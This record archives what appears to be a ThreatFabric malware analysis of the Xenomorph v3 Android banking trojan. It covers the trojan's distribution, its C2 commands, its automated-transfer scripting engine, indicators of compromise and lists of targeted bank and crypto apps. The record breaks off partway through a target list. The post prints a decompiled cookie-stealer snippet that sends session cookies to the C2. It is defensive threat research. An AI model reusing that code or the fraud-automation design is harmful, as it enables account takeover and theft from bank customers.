{
	"id": "78f2c414-9570-42e1-8e81-8ac3eb92a507",
	"created_at": "2026-04-06T00:11:44.145134Z",
	"updated_at": "2026-04-10T03:35:19.872973Z",
	"deleted_at": null,
	"sha1_hash": "d8d09d9a4c8e5166c0f2c3ec5aa0cc194590b311",
	"title": "Xenomorph v3: a new variant with ATS targeting more than 400 institutions",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1552461,
	"plain_text": "Xenomorph v3: a new variant with ATS targeting more than 400\r\ninstitutions\r\nPublished: 2024-10-01 · Archived: 2026-04-05 20:43:51 UTC\r\nXenomorph Introduces ATS and hundreds of new Targets\r\nIn the last year ThreatFabric saw a radical shift in the approach towards mobile malware from criminals. Criminals have\r\nstarted paying closer attention to the world of Mobile banking, abandoning more rudimental approaches in favor of a more\r\nrefined and professional philosophy.\r\nThe most evident example of this new wave of malware creators is offered by the Hadoken Security Group. We have\r\nmentioned this actor previously in our blog about BugDrop: the products developed and distributed by this group have\r\nbeen circulating for the entirety of 2022, while the actors themselves surfaced by claiming the ownership of the malware in\r\nMay.\r\nThe main product of this group is Xenomorph, a Android banking trojan discovered by ThreatFabric in February 2022.\r\nThis malware family has been a work in progress for the entirety of 2022, and despite being distributed in small\r\ncampaigns, it never truly reached the volume of other malware families on the threat landscape, such as Octo or more\r\nrecently Hook.\r\nXenomorph campaigns have always been characterized by short and contained distribution efforts, first via GymDrop,\r\na dropper operation created and managed by the same group, and later via Zombinder, another distribution vector that we\r\ncovered on a previous article in December 2022. 
In either case, the short bursts of activity were indicative of short test\r\nruns as opposed to a real large-scale distribution with fraudulent intent.\r\nhttps://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html\r\nPage 1 of 32\n\nHowever, things are very likely to change in the near future: ThreatFabric’s analysts have discovered a new variant of this\r\nmalware family, which we classify as Xenomorph.C.\r\nThis new version of the malware adds many new capabilities to an already feature-rich Android Banker, most notably the\r\nintroduction of a very extensive runtime engine powered by Accessibility services, which is used by actors to implement\r\na complete ATS framework. With these new features, Xenomorph is now able to completely automate the whole fraud\r\nchain, from infection to funds exfiltration, making it one of the most advanced and dangerous Android Malware trojans\r\nin circulation.\r\nIn addition, the samples identified by ThreatFabric featured configurations with Target lists made of more than 400\r\nbanking and financial institutions, including several cryptocurrency wallets, an increase of more than 6 times\r\ncompared to its previous variants, and including financial institutions from all continents.\r\nIn addition, after discovering some samples belonging to this new variant, our researchers also discovered\r\nthe website dedicated to the advertisement of this Android banker, indicating clear intentions of entering the MaaS\r\nlandscape and starting large-scale distribution.\r\nThis functionality is typical of more advanced malware families, such as Gustuff and SharkBot, which have caused\r\nthousands of euros worth of damage to their targeted institutions.\r\nIn this article we will cover the main new features of this variant, and how these new variations can elevate Xenomorph’s\r\nthreat level.\r\nDistribution\r\nTest Samples\r\nThreatFabric was also able to identify some samples connected to test campaigns: in these 
cases, the samples seem to be\r\nlinked with distribution abusing third-party hosting services, more specifically Discord Content Delivery Network\r\n(CDN). This is not the first time we see malware using this sort of legitimate hosting service: it is not uncommon to see\r\nmalware authors use services such as Discord CDN or GitHub repositories to hide their products in plain sight.\r\nThe reasons for using this sort of service are quite straightforward: these are very common services, which are\r\nvery reliable and used by millions of people. In addition, it is free to open an account and use it to distribute malware and\r\nthere is no limitation on the number of accounts. Finally, it is very common for devices to connect to such services, so it\r\nis less likely that a security service might flag connections to these domains as suspicious.\r\nIn this specific case it is likely that these samples, which are not really part of any campaign, were simply hosted on\r\nDiscord CDN for sharing purposes, and not for distribution.\r\nZombinder Campaign\r\nThe first variants of Xenomorph were distributed by GymDrop, in February 2022. Later in the year we saw the Hadoken\r\ngroup switch distribution medium, trying out first BugDrop, and finally landing on Zombinder. In our case, Xenomorph\r\nv3 is deployed by a Zombinder app “bound” to a legitimate currency converter, which downloads as an “update” an\r\napplication posing as Google Protect:\r\nThis seems to be the method of choice with the third version of Xenomorph, abandoning previous in-house developed\r\ntechniques. 
Despite this, actors behind Zombinder have claimed to have stopped providing the service, indicating that\r\nthere might be once again a switch in distribution in future builds of Xenomorph.\r\nTargets\r\nXenomorph, since its first appearance, has revolved around gathering PII such as usernames and passwords\r\nusing overlay attacks.\r\nOver the course of 2022, Xenomorph has maintained a relatively stable set of targets in its configuration, with specific\r\ninterest in Spain, Portugal, and Italy, with the latest campaigns also introducing Belgian and Canadian institutions,\r\ntogether with some cryptocurrency wallets.\r\nThe first sample of this new variant analyzed by ThreatFabric continued this trend, featuring the same list of targets as the\r\nprevious versions observed. However, another sample, seemingly belonging to the same campaign, but sporting the tag\r\n“xeno3-test”, contained a much larger list of targets, counting more than 400 institutions, more than 6 times the number\r\nof targets available in the first sample.\r\nIn the case of Android Banking malware served as MaaS, it is relatively common that different campaigns of the same\r\nmalware variant will have different targets, based on the requirements of the actors managing it. In many cases, actors\r\nwho develop malware outsource the job of keeping overlays up to date with the latest designs of all the different\r\nbanking applications that they target. There are several actors who sell this sort of service in hacking forums.\r\nConsidering the “xeno3-test” tag, it is likely that the application belongs to a test build, which might feature the actual list\r\nof possible targets from which renters can choose. 
Both lists will be available in the Appendix section of this article.\r\nCapabilities\r\nThe first variant of Xenomorph discovered in February 2022 lacked a large number of features, such as accessibility\r\nlogging and remote actions to abuse Accessibility Services to perform fraud. It is clear that ThreatFabric detected these\r\nfirst samples while the malware was still undergoing a development phase.\r\nAfter a few months of inactivity since its initial discovery, a new variant of the malware was discovered by ThreatFabric\r\nresearchers in June 2022. It included a complete overhaul of the code base, increasing the modularity of the source code\r\nin order to make the malware more flexible and easier to update. This was very likely an initial test phase of Xenomorph,\r\nwhich introduced the support for remote actions thanks to the introduction of an Accessibility Services-powered runtime\r\nengine, which could be used to simulate actions to impersonate the victim.\r\nWith Xenomorph.C, criminals also added the support for a complete ATS framework using this engine, which is referred\r\nto as RUM engine by the actors.\r\nHere is the list of all commands supported by Xenomorph V3, with the newly added ones in bold:\r\nCommand Description\r\napp_list Send List of installed apps\r\ninj_enable Enable injections\r\ninj_disable Disable Injections\r\ninj_list Not Implemented\r\ninj_update Request update of injections\r\nfg_enable Enable notification in Foreground\r\nfg_disable Disable notification in Foreground\r\nnotif_ic_enable Enable Notification Intercept\r\nnotif_ic_disable Disable Notification Intercept\r\nnotif_ic_list Not Implemented\r\nnotif_ic_update Not Implemented\r\nsms_log Log SMSs\r\nsms_ic_enable Enable SMS Intercept\r\nsms_ic_disable Disable SMS Intercept\r\nsocks_start Start Socks server\r\nsocks_stop Stop Socks server\r\nsms_ic_list 
Not Implemented\r\nsms_ic_update Not Implemented\r\napp_kill Kill Specified Application Process\r\napp_delete Not Implemented\r\napp_clear_cache Not Implemented\r\nself_kill Not Implemented\r\nself_cleanup Removes the malware itself\r\napp_start Start Specified Application\r\nshow_push Show Push notification\r\ncookies_handler Obtain Cookies\r\nsend_sms Send SMS\r\nmake_ussd Run USSD Code\r\ncall_forward Forward Call\r\nexecute_rum Run ATS Module\r\nATS Framework\r\nAs we covered in previous articles, the term ATS (Automated Transfer Systems) is used to define a set of features that\r\nallow criminals to automatically complete fraudulent transactions on infected devices. Such systems are able\r\nto automatically extract credentials, account balance, initiate transactions, obtain MFA tokens and finalize the fund\r\ntransfers, without the need for human interaction from an operator.\r\nScripts are received in JSON format, are processed, and converted into a list of operations to be executed by the engine on\r\nthe device. Here is an example of the structure of such scripts:\r\n{\r\n  \"module\": \"\u003cMODULE_NAME\u003e\",\r\n  \"version\": 1,\r\n  \"parameters\": [...], // LIST OF PARAMETERS\r\n  \"requires\": [...], // LIST OF REQUIRED CONDITIONS\r\n  \"triggerConditions\": [...], // LIST OF TRIGGER CONDITIONS\r\n  \"terminator\": {\r\n    ...\r\n  }, // IS TERMINATOR ENABLED\r\n  \"operations\": [...] 
// LIST OF OPERATIONS TO BE EXECUTED (ATS)\r\n}\r\nWith the help of such systems, the malware present on an infected device can easily extract the required PII and use\r\nit to perform all sorts of criminal activity.\r\nThe engine used by Xenomorph stands out from its competition thanks to the extensive selection of possible actions that\r\nare programmable and can be included in ATS scripts, in addition to a system that allows for conditional\r\nexecution and action prioritization. To illustrate the capabilities of this engine, we will take as an example a script\r\nextracted from Xenomorph’s config and used to extract MFA codes from Google’s authenticator application.\r\nBanks are slowly abandoning the use of SMS to perform Multi-Factor Authentication (MFA). As an alternative, many\r\ninstitutions seem to have opted for the use of authenticator applications. However, such applications are often used on\r\nthe same device used to complete the transaction. A modern banking malware installed on an infected device is able to\r\ninitiate a fraudulent transaction abusing the targeted banking application, and at the same time use the authenticator app to\r\nread the required authentication codes.\r\nIn the case of Xenomorph, criminals created an ATS module for exactly this purpose: the code collection module is\r\ntriggered whenever the authenticator app is launched by the malware, using quite flexible trigger conditions, as\r\nshown in the image below:\r\nThe engine provides quite a large set of customizable options, including for example logical operators. 
This allows\r\ncriminals to create complex conditions to take care of all possible scenarios, increasing the effectiveness of each infection.\r\nIf these conditions are satisfied, the malware will proceed and extract codes which follow a specific structure, which in the\r\ncase of authenticator codes consists of two groups of three digits, as shown in the following image:\r\nThis is just an example of an ATS script. Here is the full list of available actions and their corresponding descriptions:\r\nAction Code Description\r\nclickOnNode Clicks on specified node\r\ngetRootNode Get pointer to Root node\r\ngetParent Get Parent of Specified node\r\ngetFirstNeighborsRespectively Get nearest node\r\nfindAllowButton Finds button to allow action\r\ngetText Gets text of specified node\r\nclickOnParent Clicks on parent node\r\nclickOnFirstClickable Clicks on nearest clickable object\r\nclickAllowButton Clicks on allow button\r\nclickCancelButton Clicks on cancel button\r\nCONTROL_MODULE_FINISH_SUCCESSFULLY Communicate with control module a successful execution\r\nCONTROL_MODULE_ABORT Communicate with control module a failed execution\r\nCONTROL_GO_HOME Press HOME button\r\nCONTROL_GO_BACK Press BACK button twice\r\nCONTROL_GO_BACK5 Press BACK button 5 times\r\nCONTROL_MODULE_RETURN Communicate with control module a finished execution\r\nDEBUG_LOG_CONTEXT Log current context\r\nDEBUG_LOG_WHOLE_CONTEXT Log entire context\r\nDEBUG_LOG_MODULE_REGISTERED_ACTIONS Log RUM registered actions\r\nDEBUG_LOG_CURRENT_DATA Log data contained in current context\r\nDEBUG_PRINT Debug print function\r\nsetActionPassedThrough Sets an existing action to be ignored by the engine\r\nfindNodesByParameters Finds nodes on UI based on search parameters\r\nfindFirstNodeByParameters Finds first node matching on UI based on search 
parameters\r\nfindNodesByClass Finds node based on class name\r\nfindFirstNodeByClass Finds first node based on class name\r\nfindNodesByViewId Finds node based on ViewId\r\nfindFirstNodeByViewId Finds first node based on ViewId\r\nfindFirstNodeByText Finds node based on text\r\ngetNodeByIndex Finds first node based on text\r\ngetFirstChildOfClass Finds node which is a child of specified class\r\nCONTROL_PUT_ACTION_RESULT Store a bool indicating if the action was successful\r\nsleepForMilliseconds Sleep for specified number of milliseconds\r\nCONTROL_SET_UNPROCESSED Sets if there was an unprocessed event\r\nCONTROL_CLEAR_UNPROCESSED Clears unprocessed events\r\nCONTROL_FLUSH_ALL_CONTEXT_DATA_ENTRIES Clear all node entries\r\nSTATE_EVENT_CLEAR Clear state events\r\nCONTROL_RUN_MODULE_STRAIGHT Run ATS module\r\nCONTROL_GLOBAL_VALUE_SET_FROM_TEXT_DATA_ENTRY Set Value in Shared Preferences from data entry\r\nCONTROL_GLOBAL_VALUE_SET Set Value in Shared Preferences\r\nDATA_JOIN_TUPLE_LIST Join lists of variables into tuple list\r\nAPI_SEND_SIMPLE_STATE_WITH_OBJECT Send data to C2\r\nWith this array of features and capabilities, it is quite easy to create a script to extract information such as account balance,\r\nand then perform all the necessary steps to complete a fraudulent transaction.\r\nCookie Stealer\r\nXenomorph’s latest version also added Cookie stealer capabilities to its already very extensive arsenal of weapons. After\r\nbeing introduced in the world of Android bankers by S.O.V.A. in September 2021, this feature was also added to the list of\r\nfeatures of other families such as SharkBot, and now Xenomorph.\r\nSession Cookies allow users to maintain open sessions on their browsers without having to re-input their credentials\r\nrepeatedly. 
A malicious actor in possession of a valid session cookie effectively has access to the victim’s logged in web\r\nsession.\r\nXenomorph, just like the other malware families previously mentioned, starts a browser with JavaScript interface\r\nenabled. The malware uses this browser to display the targeted page to the victim, with the intent of tricking users into\r\nlogging into the service whose cookie Xenomorph is trying to extract.\r\nUpon successful login, the browser will extract the cookie using the Android CookieManager and will send it to the C2\r\nserver, giving criminals an additional way to perform account takeover (ATO). Here is a snippet of the code used to grab\r\nthe cookie from the malware controlled browser:\r\nWebView webView0 = new WebView(this);\r\nthis.wv = webView0;\r\nwebView0.getSettings().setJavaScriptEnabled(true);\r\nthis.wv.setWebViewClient(new WebViewClient() {\r\n    @Override  // android.webkit.WebViewClient\r\n    public void onPageFinished(WebView webView0, String s) {\r\n        String s1 = CookieManager.getInstance().getCookie(s);\r\n        String[] arr_s = CookieManager.getInstance().getCookie(s).replace(\";\", \"\").split(\" \");\r\n        if (s1.contains(\"sessionid\")) {\r\n            try {\r\n                JSONObject jSONObject0 = new JSONObject();\r\n                for (int v = 0; v \u003c arr_s.length; ++v) {\r\n                    String[] arr_s1 = arr_s[v].split(\"=\");\r\n                    jSONObject0.put(arr_s1[0], arr_s1[1]);\r\n                    new StringBuilder().append(\"cookie is = \").append(jSONObject0).toString();\r\n                }\r\n                UtilGlobal.sendCookies(jSONObject0.toString());\r\n            } catch (Exception exception0) {\r\n                UtilGlobal.sendCookies(\"cookiesGrabbingFailed\");\r\n                new StringBuilder().append(\"Cookie Grabber Error: \").append(exception0.getMessage()).toString();\r\n            }\r\n            return;\r\n        }\r\n    }\r\n});\r\nthis.wv.addJavascriptInterface(new 
WebAppInterface(this), \"Android\");\r\nthis.wv.loadUrl(\"$rstr[CURD]\");\r\nthis.setContentView(this.wv);\r\nConclusions\r\nThe Xenomorph saga highlights once more that actors are shifting their focus to mobile malware. The efforts of\r\nHadoken Security Group showcase how criminals are adopting more structured development cycles and programming\r\nphilosophies to create increasingly dangerous malware families. The latest version of Xenomorph included large\r\nimprovements over its previous iteration, adding Automated Transfer System (ATS) capabilities, which elevate the\r\nthreat level of this family even more.\r\nXenomorph v3 is capable of performing the whole fraud chain, from infection, with the aid of Zombinder, to the\r\nautomated transfer using ATS, passing through PII exfiltration using Keylogging and Overlay attacks. In addition, the Threat\r\nActor behind this malware family has started actively publicizing their product, indicating a clear intention to expand the\r\nreach of this malware. ThreatFabric expects Xenomorph to increase in volume, with the likelihood of being once again\r\ndistributed via droppers on the Google Play Store.\r\nFinancial organizations are welcome to contact us: if you suspect an app is involved in malicious activity, feel free to\r\nreach our Mobile Threat Intelligence team, which will provide additional details and help with reporting the malicious app\r\nif identified: mti@threatfabric.com.\r\nFraud Risk Suite\r\nThreatFabric’s Fraud Risk Suite enables safe \u0026 frictionless online customer journeys by integrating industry-leading\r\nmobile threat intel, behavioral analytics, advanced device fingerprinting and over 10.000 adaptive fraud indicators. 
This\r\nwill give you and your customers peace of mind in an age of ever-changing fraud.\r\nAppendix\r\nZombinder sample\r\nApp name Package name SHA-256\r\nCoinCalc com.samruston.flip 15e3c87290957590dbaf4522645e92933b8f0187007468045a5bd102c47ea0f4\r\nXenomorph V3 Samples\r\nApp\r\nname\r\nPackage name SHA-256\r\nPlay\r\nProtect\r\ncom.great.calm 9ce2ad40f3998860ca1ab21d97ea7346bf9d26ff867fc69c4d005c477c67a899\r\nhttps://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html\r\nPage 12 of 32\n\nApp\r\nname\r\nPackage name SHA-256\r\nPlay\r\nProtect\r\nmeritoriousness.mollah.presser 88d3cb485f405a6cec9d14e9ee2865491855897bfc9a958c0e7c06485a074d02\r\nXenomorph V3 Servers\r\nC2 Server Campaign\r\nteam[.]mi1kyway.tech test samples\r\nvldeolan[.]com live campaigns\r\ncofi[.]hk live campaigns\r\ndedeperesere[.]xyz live campaigns\r\nInjection Server Campaign\r\ninj.had0[.]live test samples\r\njobviewer[.]co live campaigns\r\nXenomorph V3 Target List\r\nLive Campaign\r\nPackageName AppName\r\napp.wizink.es WiZink, tu banco senZillo\r\nbe.argenta.bankieren Argenta Banking\r\nbe.axa.mobilebanking Mobile Banking Service\r\nbe.belfius.directmobile.android Belfius Mobile\r\nca.affinitycu.mobile Affinity Mobile\r\nca.bnc.android National Bank of Canada\r\nca.hsbc.hsbccanada HSBC Canada\r\nca.manulife.MobileGBRS Manulife Mobile\r\nca.mobile.explorer CA Mobile\r\nca.motusbank.mapp motusbank mobile banking\r\nca.pcfinancial.bank PC Financial Mobile\r\nca.servus.mbanking Servus Mobile Banking\r\nhttps://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html\r\nPage 13 of 32\n\nPackageName AppName\r\nca.tangerine.clients.banking.app Tangerine Mobile Banking\r\ncgd.pt.caixadirectaparticulares Caixadirecta\r\ncom.abanca.bm.pt ABANCA - Portugal\r\ncom.atb.ATBMobile ATB Personal - Mobile Banking\r\ncom.bankinter.launcher Bankinter Móvil\r\ncom.bbva.bbvacontigo BBVA Spain\r\ncom.bbva.mobile.pt BBVA Portugal\r\ncom.bnpp.easybanking Easy Banking 
App\r\ncom.cajasur.android Cajasur\r\ncom.cibc.android.mobi CIBC Mobile Banking®\r\ncom.coastcapitalsavings.dcu Coast Capital Savings\r\ncom.db.pbc.mibanco Mi Banco db\r\ncom.desjardins.mobile Desjardins mobile services\r\ncom.eqbank.eqbank EQ Bank Mobile Banking\r\ncom.exictos.mbanka.bic Banco BIC, SA\r\ncom.grupocajamar.wefferent Grupo Cajamar\r\ncom.imaginbank.app imaginBank - Your mobile bank\r\ncom.indra.itecban.mobile.novobanco NBapp Spain\r\ncom.indra.itecban.triodosbank.mobile.banki -\r\ncom.ing.banking ING Banking\r\ncom.kbc.mobile.android.phone.kbc KBC Mobile\r\ncom.latuabancaperandroid Intesa Sanpaolo Mobile\r\ncom.lynxspa.bancopopolare YouApp\r\ncom.mediolanum Banco Mediolanum España\r\ncom.meridian.android Meridian Mobile Banking\r\ncom.pcfinancial.mobile Simplii Financial\r\ncom.rbc.mobile.android RBC Mobile\r\nhttps://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html\r\nPage 14 of 32\n\nPackageName AppName\r\ncom.rsi ruralvía\r\ncom.sella.BancaSella Banca Sella\r\ncom.shaketh Shakepay: Buy Bitcoin Canada\r\ncom.targoes_prod.bad TARGOBANK - Banca a distancia\r\ncom.td TD Canada\r\ncom.tecnocom.cajalaboral Banca Móvil Laboral Kutxa\r\nes.bancosantander.apps Santander\r\nes.caixagalicia.activamovil ABANCA- Banca Móvil\r\nes.caixaontinyent.caixaontinyentapp Caixa Ontinyent\r\nes.cecabank.ealia2103appstore UniPay Unicaja\r\nes.cm.android Bankia\r\nes.evobanco.bancamovil EVO Banco móvil\r\nes.ibercaja.ibercajaapp Ibercaja\r\nes.lacaixa.mobile.android.newwapicon CaixaBank\r\nes.liberbank.cajasturapp Banca Digital Liberbank\r\nes.openbank.mobile Openbank – banca móvil\r\nes.pibank.customers Pibank\r\nes.univia.unicajamovil UnicajaMovil\r\nit.bcc.iccrea.mycartabcc myCartaBCC\r\nit.bnl.apps.banking BNL\r\nit.carige Carige Mobile\r\nit.copergmps.rt.pf.android.sp.bmps Banca MPS\r\nit.creval.bancaperta Bancaperta\r\nit.nogood.container UBI Banca\r\nit.popso.SCRIGNOapp SCRIGNOapp\r\nposteitaliane.posteapp.appbpol 
BancoPosta\r\nposteitaliane.posteapp.apppostepay Postepay\r\nhttps://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html\r\nPage 15 of 32\n\nPackageName AppName\r\npt.bancobpi.mobile.fiabilizacao BPI APP\r\npt.novobanco.nbapp NB smart app\r\npt.santandertotta.mobileparticulares Santander Particulares\r\npt.sibs.android.mbway MB WAY\r\nwit.android.bcpBankingApp.activoBank ActivoBank\r\nwit.android.bcpBankingApp.millennium Millenniumbcp\r\nwww.ingdirect.nativeframe ING España. Banca Móvil\r\nTest Samples\r\nPackageName AppName\r\nae.almasraf.mobileapp Al Masraf\r\nair.app.scb.breeze.android.main.my.prod Standard Chartered Mobile (MY)\r\nalior.bankingapp.android Usługi Bankowe\r\napp.wizink.es WiZink, tu banco senZillo\r\napp.wizink.pt Wizink, o teu banco fácil\r\nar.bapro BIP Mobile\r\nar.com.redlink.custom Banca Móvil Ciudad\r\nar.com.santander.rio.mbanking Santander Argentina\r\nar.macro Macro\r\nat.erstebank.george George Österreich\r\nat.ing.diba.client.onlinebanking ING Banking Austria\r\nat.rsg.pfp Mein ELBA-App\r\nat.volksbank.volksbankmobile Volksbank hausbanking\r\nau.com.amp.myportfolio.android My AMP\r\nau.com.bankwest.mobile Bankwest\r\nau.com.commbank.commbiz.prod CommBiz\r\nau.com.cua.mb CUA Mobile Banking\r\nau.com.hsbc.hsbcaustralia HSBC Australia\r\nhttps://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html\r\nPage 16 of 32\n\nPackageName AppName\r\nau.com.macquarie.banking Macquarie Mobile Banking\r\nau.com.mebank.banking ME Bank\r\nau.com.nab.mobile NAB Mobile Banking\r\nau.com.newcastlepermanent NPBS Mobile Banking\r\nau.com.rams.RAMS myRAMS\r\nau.com.suncorp.SuncorpBank Suncorp Bank\r\nau.com.suncorp.rsa.suncorpsecured Suncorp Secured\r\nau.com.ubank.internetbanking UBank Mobile Banking\r\nbe.argenta.bankieren Argenta Banking\r\nbe.axa.mobilebanking Mobile Banking Service\r\nbe.belfius.directmobile.android Belfius Mobile\r\nbr.com.intermedium Inter: conta digital completa\r\nbr.com.original.bank Banco 
Original\r\nbr.com.uol.ps.myaccount\r\nPagBank: Banco, Conta digital, Cartão, Pix,\r\nCDB\r\nca.affinitycu.mobile Affinity Mobile\r\nca.bnc.android National Bank of Canada\r\nca.hsbc.hsbccanada HSBC Canada\r\nca.manulife.MobileGBRS Manulife Mobile\r\nca.mobile.explorer CA Mobile\r\nca.motusbank.mapp motusbank mobile banking\r\nca.pcfinancial.bank PC Financial Mobile\r\nca.servus.mbanking Servus Mobile Banking\r\nca.tangerine.clients.banking.app Tangerine Mobile Banking\r\ncgd.pt.caixadirectaparticulares Caixadirecta\r\ncl.android Banco Falabella CMR\r\ncl.bancochile.mbanking Mi Banco de Chile\r\nco.com.bbva.mb BBVA Colombia\r\nhttps://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html\r\nPage 17 of 32\n\nPackageName AppName\r\nco.mona.android Crypto.com - Buy Bitcoin Now\r\ncom.CIMB.OctoPH CIMB Bank PH\r\ncom.CredemMobile Credem\r\ncom.EurobankEFG Eurobank Mobile App\r\ncom.IngDirectAndroid ING France\r\nמזרחי טפחות - ניהול חשבון nh.MizrahiTefahot.com\r\ncom.NBQBank NBQBANK\r\ncom.QIIB QIIB Mobile\r\ncom.Version1 PNB ONE\r\ncom.abanca.bancaempresas ABANCA Empresas\r\ncom.abanca.bm.pt ABANCA - Portugal\r\ncom.abnamro.nl.mobile.payments ABN AMRO Mobiel Bankieren\r\ncom.acceltree.mtc.screens Alawwal Mobile\r\ncom.aff.otpdirekt OTP SmartBank\r\ncom.akbank.android.apps.akbank_direkt Akbank\r\ncom.aktifbank.nkolay N Kolay\r\ncom.albarakaapp Albaraka Mobile Banking\r\ncom.alliance.AOPMobileApp allianceonline Mobile\r\ncom.ally.MobileBanking Ally Mobile\r\ncom.alrajhiretailapp Al Rajhi Mobile\r\ncom.ambank.ambankonline AmOnline\r\ncom.americanexpress.android.acctsvcs.us Amex\r\ncom.anadolubank.android Anadolubank Mobil\r\ncom.anz.android.gomoney ANZ Australia\r\ncom.aol.mobile.aolapp AOL - News, Mail \u0026 Video\r\ncom.arkea.android.application.cmb Crédit Mutuel de Bretagne\r\ncom.atb.ATBMobile ATB Personal - Mobile Banking\r\nhttps://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html\r\nPage 18 of 32\n\nPackageName 
AppName\r\ncom.atb.businessmobile ATB Business - Mobile Banking\r\ncom.att.myWireless myAT\u0026T\r\ncom.axabanque.fr AXA Banque France\r\ncom.bancocajasocial.geolocation Banco Caja Social Móvil\r\ncom.bancodebogota.bancamovil Banco de Bogotá\r\ncom.bancomer.mbanking BBVA México (Bancomer Móvil)\r\ncom.bancsabadell.wallet Sabadell Wallet\r\ncom.bankaustria.android.olb Bank Austria MobileBanking\r\ncom.bankia.wallet Bankia Wallet\r\ncom.bankinter.bkwallet Bankinter Wallet\r\ncom.bankinter.empresas Bankinter Empresas\r\ncom.bankinter.launcher Bankinter Móvil\r\ncom.bankinter.portugal.bmb Bankinter Portugal\r\ncom.bankofqueensland.boq BOQ Mobile\r\ncom.bawagpsk.bawagpsk BAWAG PSK klar – Mobile Banking App\r\ncom.bbt.myfi U by BB\u0026T\r\ncom.bbva.GEMA BBVA Empresas México\r\ncom.bbva.bbvacontigo BBVA Spain\r\ncom.bbva.mobile.pt BBVA Portugal\r\ncom.bbva.nxt_peru BBVA Perú\r\ncom.bcp.bank.bcp Banca Móvil BCP\r\ncom.bendigobank.mobile Bendigo Bank\r\ncom.binance.dev Binance - Buy \u0026 Sell Bitcoin Securely\r\ncom.bitpay.wallet BitPay – Secure Bitcoin Wallet\r\ncom.bmo.mobile BMO Mobile Banking\r\ncom.bnhp.payments.paymentsapp bit ביט\r\ncom.bnpp.easybanking Easy Banking App\r\nhttps://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html\r\nPage 19 of 32\n\nPackageName AppName\r\ncom.botw.mobilebanking Bank of the West Mobile\r\ncom.boursorama.android.clients Boursorama Banque\r\ncom.bradesco Bradesco\r\ncom.btcturk BtcTurk Bitcoin Borsası\r\ncom.btcturk.pro BtcTurk PRO - Bitcoin Al-Sat\r\ncom.caisseepargne.android.mobilebanking Banque\r\ncom.cajaingenieros.android.bancamovil Caja de Ingenieros Banca MÓVIL\r\ncom.cajasur.android Cajasur\r\ncom.cbd.mobile CBD\r\ncom.cbk.mobilebanking CBK Mobile\r\ncom.cbq.CBMobile CBQ Mobile\r\ncom.changelly.app\r\nChangelly: Buy Bitcoin BTC \u0026 Fast Crypto\r\nExchange\r\ncom.chase.sig.android Chase Mobile\r\ncom.cibc.android.mobi CIBC Mobile Banking®\r\ncom.cic_prod.bad CIC\r\ncom.cimbmalaysia CIMB Clicks 
Malaysia\r\ncom.citi.citimobile Citi Mobile®\r\ncom.citibanamex.banamexmobile Citibanamex Móvil\r\ncom.citibank.CitibankMY Citibank MY\r\ncom.citizensbank.androidapp Citizens Bank Mobile Banking\r\ncom.clairmail.fth Fifth Third Mobile Banking\r\ncom.cm_prod.bad Crédit Mutuel\r\ncom.coastcapitalsavings.dcu Coast Capital Savings\r\ncom.coinbase.android Coinbase – Buy \u0026 Sell Bitcoin. Crypto Wallet\r\ncom.comarch.mobile.banking.bgzbnpparibas.biznes Mobile BiznesPl@net\r\ncom.comarch.security.mobilebanking ING Business\r\ncom.commbank.netbank CommBank\r\nhttps://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html\r\nPage 20 of 32\n\nPackageName AppName\r\ncom.compasssavingsbank.mobile Compass Savings Bank\r\ncom.danskebank.mobilebank3.dk NY mobilbank DK - Danske Bank\r\ncom.db.mm.norisbank norisbank App\r\ncom.db.mobilebanking Doha Bank Mobile Banking\r\ncom.db.pbc.mibanco Mi Banco db\r\ncom.db.pwcc.dbmobile Deutsche Bank Mobile\r\ncom.denizbank.mobildeniz MobilDeniz\r\ncom.desjardins.mobile Desjardins mobile services\r\ncom.dhanlaxmi.dhansmart.mtc Dhanlaxmi Bank Mobile Banking\r\ncom.dib.app DIB MOBILE\r\ncom.discoverfinancial.mobile Discover Mobile\r\ncom.easybank.easybank easybank App\r\ncom.empik.empikapp Empik\r\ncom.empik.empikfoto Empik Foto\r\ncom.engage.pbb.pbengage2my.release PB engage MY\r\ncom.enjin.mobile.wallet\r\nEnjin: Bitcoin, Ethereum, Blockchain Crypto\r\nWallet\r\ncom.eqbank.eqbank EQ Bank Mobile Banking\r\ncom.etrade.mobilepro.activity E*TRADE: Invest. Trade. 
Save.\r\ncom.exictos.mbanka.bic Banco BIC, SA\r\ncom.fibabanka.Fibabanka.mobile Fibabanka Mobile\r\ncom.fibabanka.mobile Fibabanka Corporate Mobile\r\ncom.fibi.nativeapp הבינלאומי הבנק\r\ncom.finansbank.mobile.cepsube QNB Finansbank Mobile Banking\r\ncom.finanteq.finance.bgz BNP Paribas GOMobile\r\ncom.finanteq.finance.ca CA24 Mobile\r\ncom.firstbank.firstmobile FirstMobile\r\ncom.fss.indus IndusMobile\r\nhttps://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html\r\nPage 21 of 32\n\nPackageName AppName\r\ncom.fullsix.android.labanquepostale.accountaccess La Banque Postale\r\ncom.fusion.banking Bank Australia app\r\ncom.fusion.beyondbank Beyond Bank Australia\r\ncom.garanti.cepsubesi Garanti BBVA Mobile\r\ncom.gemini.android.app Gemini: Buy Bitcoin Instantly\r\ncom.getingroup.mobilebanking Getin Mobile\r\ncom.gmowallet.mobilewallet\r\nビットコイン・暗号資産（仮想通貨）ウ\r\nォレットアプリ GMOコイン｜チャート・\r\n購入・レバレッジ取引\r\ncom.greater.Greater Greater Bank\r\ncom.grupoavaloc1.bancamovil Banco de Occidente Móvil\r\ncom.grupocajamar.wefferent Grupo Cajamar\r\ncom.hittechsexpertlimited.hitbtc\r\nHitBTC – Bitcoin Trading and Crypto\r\nExchange\r\ncom.icomvision.bsc.tbc TBC Bank\r\ncom.ics.nl.icscards ICS Creditcard\r\ncom.ideomobile.discount Discount Bank\r\nבנק הפועלים - ניהול החשבון hapoalim.ideomobile.com\r\ncom.imaginbank.app imaginBank - Your mobile 